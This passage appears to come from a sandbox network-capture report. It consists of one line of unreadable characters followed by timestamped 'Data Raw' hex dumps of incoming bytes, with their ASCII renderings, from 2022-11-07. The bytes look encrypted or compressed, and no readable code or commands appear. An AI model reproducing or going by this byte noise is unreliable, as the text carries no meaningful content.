\<M&p\j2nGPJ\N\|y7a`zU_2W[hqowR,]5s_~WJ5X%?uH}]Cs&ed\|::VUy7@r\pB/~Npc=$vhp;XRan.QMBY$(#CJDht"l
2022-11-07 22:49:10 UTC	12793	IN	Data Raw: 05 50 d1 45 97 ad 9e bd c2 f7 45 af b5 2b ec 40 25 d9 19 ed a5 a2 45 26 cd 19 6d 56 ff df 6d ba a6 7f b5 2b 03 b7 36 2a da 7c c2 77 69 32 80 0a d0 60 7f 8c 88 1c 9f cd a8 1f 6e 95 cb c6 34 fa 73 bb 09 74 ce 5a bb c5 dd a0 e5 08 65 3f 6d 75 ce 2c de e9 9b 4d f0 ce 22 aa 26 3c 48 8a 7f fe 18 5b e3 26 3e 3b 8c 66 93 fc b3 97 b0 ef 12 91 7c 70 5a aa 72 00 40 25 d1 d9 9c b2 9d c9 5d b8 43 47 3d 07 9a 79 5b e6 37 1c 8b 3a 9a 1d 3f 6e c9 b9 a5 90 4f b4 90 e8 62 a6 5c 78 e9 96 22 47 37 0e 02 3b e8 00 2f cf 62 06 ab 77 ed 5f b9 c7 d1 0b 86 a5 c9 c4 82 61 1c b1 05 dd 20 5c 97 62 bb 90 85 f4 06 d5 0b af 80 ed f1 54 82 c6 4e a6 67 25 2f b3 9d 82 df 38 ad ed 33 f4 57 8b ff 01 a6 23 dc f5 14 f6 19 d5 e9 47 22 54 7f a2 21 54 66 77 97 bd 22 23 1a 72 3a 06 de b2 f2 f4 58 Data Ascii: PEE+@%E&mVm+6*\|wi2`n4stZe?mu,M"&<H[&>;f\|pZr@%]CG=y[7:?nOb\x"G7;/bw_a \bTNg%/83W#G"T!Tfw"#r:X
2022-11-07 22:49:10 UTC	12809	IN	Data Raw: 40 24 5b 0f ab 17 be 01 87 c2 4c b8 e2 3a a8 50 45 df 28 c2 74 e4 e4 83 53 9a ce a0 91 dc ea c3 b0 13 bd da 7b 14 02 d4 84 0b 7d d2 01 e2 8b 79 bb 06 41 75 08 85 81 f2 be 56 ae eb 97 f0 4a 85 e3 c4 a8 3b 01 1e 46 9c a9 41 62 f8 78 3a 70 b2 92 80 37 48 b0 b3 e4 c9 63 dd fa 14 72 c5 cb 62 c1 50 b6 d4 d8 3a ac a5 57 01 db f8 7d ac 61 b5 f9 15 a6 08 0f 86 d2 0a 79 5c f9 89 dd f0 dd 8b 6c 86 d0 20 cf 85 d3 a5 77 f4 96 cc 18 0c a4 5b bf 2c 5f 8c 29 c4 62 09 5b 8d d2 62 de 75 17 29 35 07 3a 0c c1 60 4f 2b 81 4c 89 fc 09 86 e7 69 ca 82 0f 54 9c 4d da df 9a d5 69 15 c3 af 4c 61 43 70 47 53 b0 6e f5 4e 19 d1 f9 19 e9 1f b2 38 92 76 25 d9 be fd a3 60 92 e7 0f 80 87 d9 82 7e 2d 34 3b d0 c3 90 77 c6 24 fb 67 ea 6c 25 2b 2f 08 ea 51 f7 98 be 2e b4 37 26 31 1a 6c 2b 89 Data Ascii: @$[L:PE(tS{}yAuVJ;FAbx:p7HcrbP:W}ay\l w[,_)b[bu)5:`O+LiTMiLaCpGSnN8v%`~-4;w$gl%+/Q.7&1l+
2022-11-07 22:49:10 UTC	12825	IN	Data Raw: ef 5a 6a cb 38 96 f6 c3 01 55 42 33 9f 9e 84 45 ed 34 a9 e6 d9 e3 dc 07 fd 6f f1 fb b7 12 7c 3e d2 bb d4 88 c7 49 46 41 72 21 dd cc 34 8d 2b 73 0a 51 02 01 ed 97 c6 56 c1 1f 6c 70 bf f0 86 e3 9c 7a b2 c6 a4 7e 74 c7 28 58 68 1e 25 3b 8d ed ea 06 f2 de 22 fd 5b 43 f2 21 96 a4 27 b7 2e 0b 4b ee 0f 08 3f 5e 5f 30 58 d5 5e ab 0e 95 a9 fe 33 aa 5c a3 c7 60 49 72 46 b7 46 23 9a 57 f3 d7 9a 65 d6 e0 86 57 14 57 d2 c3 21 3a 4a 90 a0 4a 3b a2 82 69 78 1d cb 7a f5 f5 9e 7a ce 66 92 11 66 45 24 c7 c5 07 e0 44 f5 15 e9 dc f4 b3 81 ec 2a c9 03 30 ae 85 26 2d 9f 10 1e f7 f7 40 b1 a7 1c 64 b7 d1 c4 f0 35 31 7d 5d 28 bf af ae b1 c2 f0 fd ee 16 da 41 e1 df b9 27 19 bb c2 20 ba 94 be 00 d4 c7 e8 b5 a7 12 55 ac 47 c9 86 71 c8 ad d8 38 ec c9 81 5d 49 49 ff 89 e3 dd b9 65 1a Data Ascii: Zj8UB3E4o\|>IFAr!4+sQVlpz~t(Xh%;"[C!'.K?^_0X^3\`IrFF#WeWW!:JJ;ixzzffE$D*0&-@d51}](A' UGq8]IIe
2022-11-07 22:49:10 UTC	12841	IN	Data Raw: 5d 6a 41 2a 8c d5 ed 9b 3c bb ca 73 75 9e 1c 91 f5 19 0c 9e 11 68 1d 57 67 5c 91 aa 7d 9b a5 f2 3e 6e dd 15 59 45 22 23 da d1 14 8b 69 d4 3d ee 5b 21 4d 48 a2 1c 33 25 4b 26 87 c8 46 68 d5 55 52 32 a2 86 37 cc 32 8d bb 29 8b 6b c8 e5 0e 24 7c 33 d5 4f 78 44 87 fa 2f a8 97 d4 fc 59 16 55 6b 1a 58 e8 e7 07 17 a0 e5 db d4 11 c2 6d a5 55 71 8e ac e9 d3 ad 78 43 fb dd 69 60 71 bb 57 d5 58 9e 36 61 1d 37 af 04 d1 c8 9f 42 39 7d 38 75 71 d3 25 37 7a e8 be 09 47 b2 09 6f d1 d1 ef 78 ed 30 fd 9c 57 11 71 1a 5d 22 4d 71 70 b3 59 7f c4 ce e2 a6 2c f2 ed eb 06 e7 9a f6 fc b9 48 58 e6 f6 4b 8e eb b4 51 9a a0 3e 9c 7c c5 f3 e7 7f 45 b4 3f e2 6f 2d a5 86 01 eb fc 32 60 ac 0d c6 5a b5 00 aa f7 05 a5 69 b3 a6 ce e8 71 bf c3 c0 1b 7e c4 3c 68 37 dc 54 ce 11 c0 42 0e 2e 40 Data Ascii: ]jA*<suhWg\}>nYE"#i=[!MH3%K&FhUR272)k$\|3OxD/YUkXmUqxCi`qWX6a7B9}8uq%7zGox0Wq]"MqpY,HXKQ>\|E?o-2`Ziq~<h7TB.@
2022-11-07 22:49:10 UTC	12857	IN	Data Raw: f1 5c bd bd c1 a2 f3 c9 c7 67 f0 9e 4f 58 ad 05 41 83 8b d2 19 ef b4 f3 fa 1a ba ab c2 5d c0 92 62 0d 08 b3 b2 5a bf dc 32 cd 81 f5 67 1b 32 a2 0a 39 42 fc 84 8f e9 ed d8 38 4f dd e9 76 6b 53 b7 9d f7 bf a2 52 0d d4 f7 9e 0a e7 99 27 d4 d5 96 62 c1 10 16 c8 44 96 9a 19 64 11 93 85 99 35 cb 7d 2e 1a 4d 46 14 0b 94 2c 7e 40 9f a3 08 55 c0 2f 8e df cb 1a 1b a0 05 c4 18 55 32 d2 e6 ff 3a 54 f8 23 c3 7b 4a 6d b6 a6 e3 b3 e5 89 9a 39 c3 ae ac 38 05 56 f8 f1 e2 b0 b2 fa da 1a 37 51 33 e7 0c f7 20 b4 fa b9 f1 f1 6b 98 be fb 5d 53 c7 1a 6b da 7f f7 1f d3 99 cb d5 9f ad ea 21 12 08 17 ee 57 26 78 82 07 1a 87 d0 b5 3b 8a 3e 84 d7 9c 88 13 d6 2e 6e ab 01 71 78 1f 16 2f 83 6d d5 e8 cd 95 be 39 73 6c 3f e0 24 0a 54 ba 06 cc 2c 2a e3 16 42 ac 2e 35 99 9a d7 81 ff 24 3e Data Ascii: \gOXA]bZ2g29B8OvkSR'bDd5}.MF,~@U/U2:T#{Jm98V7Q3 k]Sk!W&x;>.nqx/m9sl?$T,*B.5$>
2022-11-07 22:49:10 UTC	12873	IN	Data Raw: 1f e6 a8 22 d5 15 86 62 15 f3 78 d3 a8 69 28 57 36 4b e6 2c 52 1c da 81 cc ad 40 ee c9 2c 42 c7 2f 20 6d 71 d8 03 b6 fe 72 f1 14 b6 fe 67 56 da b7 16 c6 0d 2d c8 71 5b 69 3a ee e1 27 f1 48 dc 04 9c 89 61 a0 3f 7d d7 bf ab 90 a7 71 67 08 b3 fd 29 35 a4 9b 65 1b dd cb 7a b9 29 d2 fc 29 e6 f8 0e 3b 20 e7 64 05 d7 f4 a7 ad ea fa c0 8c 83 12 cf d1 46 33 11 38 24 f2 0b 17 84 e1 ce 54 23 2b 8c 35 b9 c5 e0 a6 73 81 eb 16 ae b2 92 84 f6 e1 24 2e a8 06 57 c7 27 51 d8 5e 9c bd 8d 39 94 8b 6d 85 fb b2 91 c9 34 e7 1e 53 bb c8 91 33 fa 45 a1 74 49 7b b7 c4 92 7d 3a 79 66 8c 3d eb 59 bb 64 e3 28 70 6d 45 5e 24 7d f9 91 45 85 7c d1 78 58 14 c9 73 2c 74 57 07 71 c4 29 8b 71 4d 38 af bc 6d b9 3c 10 f5 34 c4 31 10 ff 0a 69 e4 6b 2b 4e 29 0a 01 07 57 6a b1 dc 32 0f 8d 84 da Data Ascii: "bxi(W6K,R@,B/ mqrgV-q[i:'Ha?}qg)5ez)); dF38$T#+5s$.W'Q^9m4S3EtI{}:yf=Yd(pmE^$}E\|xXs,tWq)qM8m<41ik+N)Wj2
2022-11-07 22:49:10 UTC	12889	IN	Data Raw: 65 cb db ca f2 51 64 b9 fe ba 75 6c 7b 30 90 d2 8f 37 56 a8 d8 ed 2c 70 e9 fc 64 ca 95 26 1f ef cd 46 f3 a1 d5 81 03 c6 28 f7 66 d8 fa 4a 48 20 ec dc ff 28 1f 0e ad 41 9c 43 7e 3b 39 6b b8 d8 84 42 fd 0c 24 09 f5 eb e5 00 d0 15 e5 76 a5 73 c2 a7 b9 82 2b d8 da 70 e8 d0 ca c8 79 4c 7a d3 88 19 41 bb 02 7c 0f ef c5 8a 65 d5 b5 ae 46 ac db 73 c6 00 0b d2 15 04 1e 30 f9 ee 75 6a fb 38 0c 41 78 0a 87 e6 5c 36 cd 5a 2d 9e d9 78 f9 00 bc 7e 22 d4 bf ca 06 3e 43 9b e2 d6 7d 11 3b d5 e8 df d1 45 5e e7 66 a1 53 9d bf aa 3f 89 50 01 b1 ba 7c f0 86 35 7a e2 35 b8 c1 2d 1f ea 34 00 c9 c1 cf c0 cc e1 25 60 9c a2 4f 4e ca a7 d8 5a 4a f1 f9 0d 67 c1 42 bb 04 e4 2f 80 70 f7 49 28 f4 17 28 04 a0 fc 77 4a ec 63 ee f9 a9 91 1b 34 d4 86 b0 a7 f8 a2 7c 06 3d 44 01 80 9c 40 88 Data Ascii: eQdul{07V,pd&F(fJH (AC~;9kB$vs+pyLzA\|eFs0uj8Ax\6Z-x~">C};E^fS?P\|5z5-4%`ONZJgB/pI((wJc4\|=D@
2022-11-07 22:49:10 UTC	12905	IN	Data Raw: 93 97 e0 e1 51 5a 22 e4 95 99 09 a0 42 f7 84 88 41 78 3c 58 df 8c a4 1f f9 71 63 df 8b 61 4a 8c d1 16 e0 c9 70 62 b2 e8 2d 32 c9 6f 47 ee 17 0b 69 90 eb b2 e7 91 76 7a 79 9e b3 5f af a7 10 b1 52 74 f9 7e 55 18 6e 49 e7 91 32 ab 94 23 64 fc f4 f6 0d 2c 9b c9 60 db a3 87 dc d8 d9 35 99 4c 93 00 f6 3d 3d 67 18 a8 8b 0a 62 5f 67 6f 3e 7a a2 af ba b6 00 9d 1f 19 4d b8 9f f7 8a 63 f2 b1 64 b5 86 0a 13 bf db 56 24 82 11 91 ff 93 3c 0f 4a 3c cd cb 5c ba f1 c2 47 06 4a aa 92 29 b0 85 f6 2c 5d da d1 ee 1a 0f 30 ed e3 86 cc 3b a0 ad c6 d3 20 4b 26 81 61 05 1f 64 e8 c4 e8 a6 e3 5a d1 29 6f 5e 6c a3 df ca ff 28 b2 56 6d 00 15 6a f1 33 4d 24 1a 3d 3c bf a6 93 12 66 8c bf db f9 62 6a e9 24 a7 c6 2d 52 46 24 89 c1 c9 59 a8 df ba 6b b1 87 fc 97 35 b8 f2 12 4c 0a 54 fa be Data Ascii: QZ"BAx<XqcaJpb-2oGivzy_Rt~UnI2#d,`5L==gb_go>zMcdV$<J<\GJ),]0; K&adZ)o^l(Vmj3M$=<fbj$-RF$Yk5LT
2022-11-07 22:49:10 UTC	12921	IN	Data Raw: c2 74 4e 82 9a ef 1c 74 69 d9 6d be 60 c3 e2 87 8a fb 02 1b c6 9c 9c 09 5d 5e 6a 97 e5 89 14 3f db 3e ed 58 30 78 9f fb c4 a7 ea b0 20 fd 73 a8 32 da ea 29 4f c8 89 1d e3 5b 19 64 d4 9e a9 93 46 4b 3d 54 22 15 80 25 b7 21 a2 3d a0 1c 59 a9 13 4b 4e c6 07 e8 9f de 12 bf f9 41 cf 9d 1a ad 5d 2b 0e c3 a3 6a 04 3d 6d c9 d3 30 f9 6a fa f2 a5 10 69 c9 48 78 8e 1e 8b 39 46 b2 6d ad 38 1c 25 c9 49 38 1c 47 23 fe 75 28 2c 7f a9 5d 22 44 85 59 6e de 26 37 14 da c0 1e db 1e 5d 12 f6 f4 cb be a0 ab 0b 9c b7 9a b6 7e 37 47 15 47 25 f9 bd eb 1b aa 8a 58 f1 2d b6 08 67 e7 79 05 86 28 3f 95 9c c9 7d 98 53 f9 88 d3 24 c9 bc 90 3b 95 99 0d ac cb 0b d2 81 f9 e4 3f 15 1d 28 a4 a3 75 a2 ad 72 d2 7f 34 e8 4f 49 4e b5 b4 6d 18 70 48 dc 90 fa 81 bf e9 3b 96 66 45 c5 0a 7d 72 e0 Data Ascii: tNtim`]^j?>X0x s2)O[dFK=T"%!=YKNA]+j=m0jiHx9Fm8%I8G#u(,]"DYn&7]~7GG%X-gy(?}S$;?(ur4OINmpH;fE}r
2022-11-07 22:49:10 UTC	12937	IN	Data Raw: f3 0d 05 37 b7 3f 2f 4f 16 85 07 60 91 74 8d f0 4b 8b ff 46 bb 55 42 2c ab c9 02 8f ea 68 88 25 c3 5a d0 01 01 9d a2 7e ce e6 11 95 8e 0d 7f 42 f3 ad 04 78 8e 06 80 9d b0 ab 07 3d 01 d8 b7 09 c8 60 2d 50 74 17 ae 28 00 77 e9 19 4d cb 46 c4 61 6b 04 0f c2 7a 6e 82 8f 78 00 00 a8 9c e2 87 63 e7 4e 46 9b b0 03 57 78 98 3f 66 78 b5 86 11 56 5e aa 40 39 e6 71 5d be 17 ae 1a 4a b1 8d 0b b3 18 57 9c 54 56 13 a3 c3 0e 52 ff 69 01 55 03 7c f7 2c 63 b8 95 8b 0b 6b 6c 42 39 c3 9a dc 55 a5 6f e4 ce 23 4c bd 15 d5 d4 82 3b dc 01 80 77 0d 63 8d db c5 fd 26 ac 28 da e8 96 a0 f2 ca 4e ed 01 7c 8d 8e 38 53 c5 04 92 64 d9 03 45 90 bf 68 b1 0c eb dc 77 be 74 a0 cc 3f fa 41 da cb 29 e4 20 2f 9e 57 b9 07 7e 45 93 de 50 a9 43 9a 9f 74 a2 a7 48 03 72 12 67 7d 9a fe e1 dd b0 97 Data Ascii: 7?/O`tKFUB,h%Z~Bx=`-Pt(wMFakznxcNFWx?fxV^@9q]JWTVRiU\|,cklB9Uo#L;wc&(N\|8SdEhwt?A) /W~EPCtHrg}
2022-11-07 22:49:10 UTC	12953	IN	Data Raw: d5 1d 28 06 a2 0c 7e 47 42 83 54 c6 46 38 43 a4 87 ae 0e ab 87 d0 59 28 47 58 df 78 dc 22 94 ae fb 40 b8 9b 54 13 3a 73 5b 40 a3 bc 7f 29 d9 9c 52 68 da 6a 71 db fe ad 22 5f 5f 73 9b 0c a6 8c 5c 07 af 5d 5b 2e a3 48 21 46 8c db 13 f8 84 38 4a cd 45 09 15 4c 3e 06 00 24 11 08 86 b0 60 10 61 4c 7a 05 22 e6 2f 10 f7 06 03 e0 e8 a5 da 1f 98 46 70 ef 0b 00 00 4a 73 78 eb d2 44 05 e1 d8 91 9d 4a 65 66 6d 78 e3 ae 13 43 d5 9f c4 e0 18 74 79 f0 7e ed 36 bc ac bf 08 f4 67 d6 c0 d9 fb e6 14 b8 20 23 71 e3 b0 e0 e1 89 9e b5 fb f5 e0 52 34 ee aa 37 0e 9c 96 48 60 a6 f5 73 4c e9 e9 7f 5e 8a 77 dc 19 cd 47 09 08 cc 24 49 c4 7c 44 47 f9 af 57 f7 82 5e d6 cc 07 b7 32 b8 2f ec ac 10 5e 83 cd 20 8c 53 63 6c 40 b9 0b f1 28 16 0d c2 8c d3 17 41 cd 3b 25 f4 a4 cc 47 90 21 00 Data Ascii: (~GBTF8CY(GXx"@T:s[@)Rhjq"__s\][.H!F8JEL>$`aLz"/FpJsxDJefmxCty~6g #qR47H`sL^wG$I\|DGW^2/^ Scl@(A;%G!
2022-11-07 22:49:10 UTC	12969	IN	Data Raw: 8a 01 28 9e 1a fa cb e5 63 2a 22 f5 ab 6d bd 6d be b3 c9 5d 6e 67 1a 3b 41 88 7b 21 bc 2e 95 61 f5 38 9c f0 77 b4 be 4c 76 bb 88 96 36 ff 4e 92 8e a6 56 c6 9d 7e 90 bf 0e ed 22 0e c9 2b f9 8e fd 0f d1 81 8d 1a ad 84 a2 ba f5 86 9d 86 a5 5f a0 87 f5 6e 21 4a fb 64 ce 41 bc 18 5f cc 83 2e 7e e0 eb 2e 45 41 cc 07 27 a2 45 02 8a c2 a7 0f 83 e1 56 19 9d 9f e0 d4 51 2b 65 ae ad 52 db 3b 67 f3 4a 3b 12 f0 dc 24 93 5a 50 63 4d ba 65 5d 8a ef fb 2d db df 3d 5a 1b c4 5c 23 57 f7 c4 f7 e4 b1 6f 1c ed df a2 01 f8 31 11 bc 77 20 b5 2d 65 73 38 66 4d 4e 22 ae c7 e0 15 61 8a 31 6b 8d 37 bc 0d cd a4 82 98 60 78 45 64 fb 57 ca 6d 32 3d 6b ce f8 c5 04 58 fc 5e bb db 6c eb 04 21 57 33 86 ea 04 ca c4 4a 42 1c 99 19 b6 31 0a 16 4d 8c 71 fe ba 52 e3 6f 34 be 99 c9 94 75 11 0e Data Ascii: (c*"mm]ng;A{!.a8wLv6NV~"+_n!JdA_.~.EA'EVQ+eR;gJ;$ZPcMe]-=Z\#Wo1w -es8fMN"a1k7`xEdWm2=kX^l!W3JB1MqRo4u
2022-11-07 22:49:10 UTC	12985	IN	Data Raw: c1 10 b6 62 73 02 34 1d 81 9f 0b 34 79 7d a2 7e b6 5a 7f 2c 4d ca b0 82 68 95 e8 d4 58 45 4b e3 83 2f 0c 9f 34 b2 6b 6d 60 f6 69 74 85 ef 73 83 0d e5 c5 eb aa ed f0 7b a8 bd 90 5c 47 0e c7 02 72 36 71 ea 9d ba b4 fe 09 67 71 75 a9 30 8e 47 0a bc 57 68 e9 d8 49 96 73 ee 81 e4 83 af 13 2b 3a be be 97 6b c5 55 01 f4 bc ef aa f8 72 6d 41 90 f4 59 cc b4 16 99 5c 9b 8e 59 66 86 81 e4 65 1f c3 00 61 1d aa b0 f6 61 6d 19 f9 29 8b 49 51 4e 78 33 6e 8e a2 d5 5f 97 ef ef ef 32 70 eb de 05 c5 49 65 65 01 fc f0 8f 67 e1 c1 84 c3 0f 1e df 2f 9f e8 f4 df 86 d5 c6 bf db 20 2d da de 79 33 51 0c af 03 12 ef db 63 ea ea 35 c0 9c a4 69 72 b7 ed de c8 ed c3 d3 b6 02 32 77 79 10 eb dc 0c 1d 16 ea e5 af fb 51 1e 77 5f ff f9 3a 41 51 fe 38 b8 44 61 69 f9 72 91 00 47 35 68 24 01 Data Ascii: bs44y}~Z,MhXEK/4km`its{\Gr6qgqu0GWhIs+:kUrmAY\Yfeaam)IQNx3n_2pIeeg/ -y3Qc5ir2wyQw_:AQ8DairG5h$
2022-11-07 22:49:10 UTC	13001	IN	Data Raw: 15 d4 1d 1d 23 69 aa 98 32 be b3 2a f0 13 ce 04 87 0b 87 9e 79 a0 4a 21 3d 57 37 b2 2d 78 a5 9c 8d 22 24 db aa 83 8a 4d c2 69 f4 7f 03 67 26 92 c8 8a ec 4b 10 14 a8 03 2c 2e 03 7a 4f 22 df 03 27 e8 2b ac 6e cf ee b9 7d ff bc 72 0d bf a3 46 e1 a3 98 cc 25 af 7f cb 92 c6 6f 6f cf 2e a8 ef 53 e5 21 07 98 a9 35 0d 79 eb c5 5d c2 10 ba 1c 4b 8c 3c c6 14 cd f9 02 ce 9e e2 ff 3c 7e d9 b9 6f 1c 6d 92 03 42 7a bf 6d 3b 3f 30 83 b3 a8 96 1f ce b6 ce 49 f6 ef 49 6f 9f df 59 d9 99 f9 ea 58 fe 93 f0 e8 88 9a 7a 17 06 fb a9 7c 05 cc f7 52 39 f3 0b 8a fa f0 c0 17 c7 52 c3 4b 8c d6 a2 a3 72 0d 54 e4 2f fc c9 9a 3f e1 bb 24 0d 18 8c 34 94 18 5f 28 43 04 35 8c 60 1f 78 34 fa c2 be 85 fc dd c6 61 56 34 b1 4b bc 7a ec 7a 8f 52 6b 9e 7d 93 e0 f7 ea fb 52 b5 4f 2a 62 8b f1 07 Data Ascii: #i2yJ!=W7-x"$Mig&K,.zO"'+n}rF%oo.S!5y]K<<~omBzm;?0IIoYXz\|R9RKrT/?$4_(C5`x4aV4KzzRk}ROb
2022-11-07 22:49:10 UTC	13017	IN	Data Raw: 54 88 2c fb 34 64 4f ed d2 5a 98 ef 12 cb 86 bb 07 f8 fb 25 b5 f9 62 77 39 7f 91 ee 0a 8e a1 9f 10 b8 07 a5 5d be 59 be a2 af 37 01 96 e8 d0 10 cc 05 c9 ba 10 6f e6 16 55 9a 32 dd e7 78 9f dc 22 4e af 10 04 43 d8 7d ab a6 8f de 76 c4 a9 fd 41 2e 6e 28 36 cf f9 c3 54 db 47 e2 ef 7e 73 9a 75 c0 f5 0f 51 84 5d 9c 21 06 06 2a f3 3d cd 5a 2c 13 3f 09 47 7b 9b c3 4c 33 5c 74 ba db bc 52 5d 00 fe 6f 55 fc af 7c 92 58 ee ff d6 51 64 d2 ab 67 39 74 25 23 91 92 bb ec 29 b2 e4 19 ed cd a6 b5 ea e9 ca d0 e7 bb 17 da 32 a4 8b b4 fc 9d 6c 1f 47 e7 43 e1 8b 7c 2b 35 52 44 96 8b 62 57 74 8c 77 13 2d 71 93 6a 2a 07 74 3c 12 5b 63 44 d1 85 88 ec 75 b3 21 63 d7 03 57 f4 9d 19 3a e9 e7 ba 61 74 a3 ac d7 64 44 68 9d 9e d7 ac 78 2e 72 7b c7 6e 9f 3e 0e 0e 59 d7 a3 c3 c4 61 74 Data Ascii: T,4dOZ%bw9]Y7oU2x"NC}vA.n(6TG~suQ]!=Z,?G{L3\tR]oU\|XQdg9t%#)2lGC\|+5RDbWtw-qjt<[cDu!cW:atdDhx.r{n>Yat
2022-11-07 22:49:10 UTC	13033	IN	Data Raw: 3e 3a f6 f2 ae 96 8c e6 18 fb 6d 31 16 c2 0e 34 2d 34 cb 35 ca 71 7a 14 8f f1 75 8b 73 57 0a 03 2f 39 43 86 5c 3c 66 a9 52 ee f9 66 8c 9f 5c 0d 7e d5 a8 f1 1c 1d 79 96 79 76 1b 6f 3c 1a a4 9d ef a5 b2 fe 7a 28 7a 75 f6 e5 ce 43 2c 56 95 54 a6 53 e4 24 92 fb 3a d6 a2 c1 52 93 1b d9 80 e7 49 3e 44 57 de 74 dc 34 78 e2 4b a7 fc c7 85 86 21 62 91 f0 85 52 cd 70 e2 f5 71 ac ec 17 4a 66 e4 00 de 90 b6 32 fa e3 3b 42 0b b9 94 5f 25 4d 3f 86 5f d2 23 5b 43 47 cf 5a 7e 61 bb 39 a7 93 4c 70 91 fb e6 45 7a 39 2a 83 1b 20 0c 80 22 e4 f6 57 72 69 82 d7 86 3c 38 14 f1 04 1c bd 98 03 bd 8a d9 c9 4e fc de 0a bf da 3a 06 87 ef ba f7 f6 2a 8e a2 42 28 a2 a3 9c 9a e5 a5 9f df 12 e1 68 0f 04 8e fd b5 cf a8 b1 75 43 1c 20 fa 86 7b c8 25 22 00 d0 96 87 2e 71 32 0a f5 6f bc 07 Data Ascii: >:m14-45qzusW/9C\<fRf\~yyvo<z(zuC,VTS$:RI>DWt4xK!bRpqJf2;B_%M?_#[CGZ~a9LpEz9* "Wri<8N:*B(huC {%".q2o
2022-11-07 22:49:10 UTC	13049	IN	Data Raw: 36 3f a5 d9 58 fc 40 36 63 11 be ce 56 43 60 a7 61 e3 77 3e 84 86 39 42 e9 aa 15 d8 33 ea f1 0d 10 82 67 b5 27 4a 77 d9 c5 4c 81 bb cd 18 e2 e5 96 13 40 14 f8 0f 8f f2 6c 9b ed bc ce c0 b0 99 dd 5a 42 2f 94 1d 5f b2 2a 8e 40 4f ac 89 f7 f2 a8 fb b7 db bb 25 e4 bd b9 c5 bc 83 2a fb 4a 6d d1 58 3f 31 bb 10 3c 0e 81 74 f9 ca 5d 57 bb c9 8e 11 85 ea cc 7c 0f 81 28 8c a5 6b 4a c7 2c 48 40 04 a7 bb 07 42 0a 2b 2a c8 33 03 65 d4 18 f3 8f 65 a3 71 51 b3 75 da f8 34 ab d3 6a 44 fb bd 24 81 81 67 13 dc 5e af 7e 78 78 50 b4 01 83 94 da 4d 58 f8 45 c3 b8 bd 85 27 35 3c 77 c4 5e d2 6f 7c e4 b3 36 59 df 48 4e 51 53 b3 7a 1f 17 56 70 8b 6c 07 5f 10 7a 26 cd de b7 11 ec 5f ae 38 aa 0f 98 df 86 46 c0 43 a7 75 23 d2 6b 3d ea e8 d3 80 1e 7f 1e 30 9e 65 79 41 6a 9d cf d1 c8 Data Ascii: 6?X@6cVC`aw>9B3g'JwL@lZB/_@O%JmX?1<t]W\|(kJ,H@B+*3eeqQu4jD$g^~xxPMXE'5<w^o\|6YHNQSzVpl_z&_8FCu#k=0eyAj
2022-11-07 22:49:10 UTC	13065	IN	Data Raw: de 18 8d b1 df fb cd fd fb dc 99 fb 9c 73 9f 79 7e 33 c7 4f d8 be 17 ee d9 91 93 64 90 10 8f a8 90 ad 67 47 22 8c e9 a3 8f 74 80 cb ec 07 a7 78 a9 07 c3 74 96 95 1b 8a d8 b2 0f dc d3 74 90 3b 8a 9a 9b e4 2b 27 2c 80 c7 0e 63 fc 7e 0b bd bb 55 d8 45 0b 8e 10 0a 8d b1 37 02 60 52 c1 83 af c1 3d 98 92 9b 9d 2d 6f cb 89 d0 c7 e7 dd 7b cc 97 e4 d7 b8 06 c1 29 5e a1 f2 73 64 99 73 ba b7 d1 c4 9b e9 89 9d 9b 4f 6a b8 ce 56 08 84 c5 53 b6 37 a5 7d a4 3a d9 c5 0c c3 b3 fb d2 12 87 60 86 c9 0d 28 f9 1d 44 8b 65 71 1c 34 2d c5 ef 76 0d 00 00 74 a8 cf ee c9 d5 01 80 1e 28 28 e4 84 0c 78 9f 2d 70 83 7a 00 0f fc 7e 3e 0b 95 b2 07 00 bb de 5c 00 e0 65 4f f8 6c d7 a0 96 d1 56 37 01 17 4b 39 40 88 4e cd 42 7f 13 39 f6 eb cc 3a f4 ba f9 57 1c a2 1a a3 e0 92 23 3b 35 4f 33 Data Ascii: sy~3OdgG"txtt;+',c~UE7`R=-o{)^sdsOjVS7}:`(Deq4-vt((x-pz~>\eOlV7K9@NB9:W#;5O3
2022-11-07 22:49:10 UTC	13081	IN	Data Raw: d0 2d 2a a7 a5 31 ed 58 d8 c4 2a bf 79 bb ae 80 f0 d4 24 12 13 f1 33 fd 60 dc e1 f9 0a 89 44 29 08 1c c0 03 be 16 bb 36 35 71 07 f5 ef ec 16 06 c2 cb ad b7 14 9a 30 56 5a a8 92 2a c0 90 97 7b 3c 77 95 c6 aa ed aa 61 bf 6f 24 40 c1 30 50 48 f2 e6 10 94 07 71 9b 00 68 03 af 02 60 4c d8 80 76 57 21 c6 a1 d3 c7 aa 32 5f 54 c3 26 ce 42 51 35 57 07 20 4d b4 d2 80 7c 1e 78 50 be af f8 75 70 4b f6 c2 87 01 66 17 b7 4b e7 46 a6 18 c3 6b 26 d2 33 e4 2b 5d 27 94 be 72 03 fa de 77 12 00 a2 11 b4 68 85 6f 78 55 79 44 04 10 bb a0 cd 5c 69 f0 69 de 13 c4 a0 12 4b 34 f6 a1 ba f6 f7 7d 1b 5b 89 e3 86 8f 98 5f ca 83 07 90 e4 4e 89 d2 ef f2 c8 35 9f 01 79 b0 0c 44 fa 12 6e 06 a0 77 aa 1b 7e 61 fe 81 e8 cc af c6 a1 dc 11 a3 ca 3c c2 81 62 b1 33 87 0d 8f da 85 cd 04 b1 26 4f Data Ascii: -1Xy$3`D)65q0VZ*{<wao$@0PHqh`LvW!2_T&BQ5W M\|xPupKfKFk&3+]'rwhoxUyD\iiK4}[_N5yDnw~a<b3&O
2022-11-07 22:49:10 UTC	13097	IN	Data Raw: ae 08 1d df c4 53 13 c3 f9 0d c4 ec 4c 3a fa 1f 00 3b 80 c4 7f c2 f7 bc 79 2d 99 b0 0c 36 7f e4 28 f6 da cf 17 cd 25 5b 6d be cd fc 60 33 2d 18 ee 04 14 22 3a 7e 11 b0 9d ff ff 57 5f 26 23 24 87 d1 8b 48 54 f7 c7 b8 b4 06 cc 27 49 01 dc 2d de 9c f9 a4 57 85 c5 e2 76 3c e3 b4 72 49 f9 ee 02 00 81 b4 43 1e c5 5b 3d c1 36 85 88 01 0f d1 c1 66 03 cb 18 d3 d1 1c c0 0a 07 d5 89 e6 24 a3 7b 81 c7 8c 89 ff ff c4 06 08 3a 8e 43 50 00 cb c9 d9 f8 5d ad 66 81 dd 30 3b 81 29 c2 f6 2c 9f 2a 7f 06 d7 ef 89 33 88 4e d0 f0 ed 43 86 11 a9 d4 cc 26 9e f3 fd 63 50 72 63 03 d0 99 df 2d d5 cd a8 3c 11 4d b9 09 9f d7 f1 f1 6b 00 be 50 47 ef 22 04 1b da 51 92 6f b0 cb ee f7 8b 30 40 d9 b2 1b af 34 90 c2 c5 c0 4f 2f 53 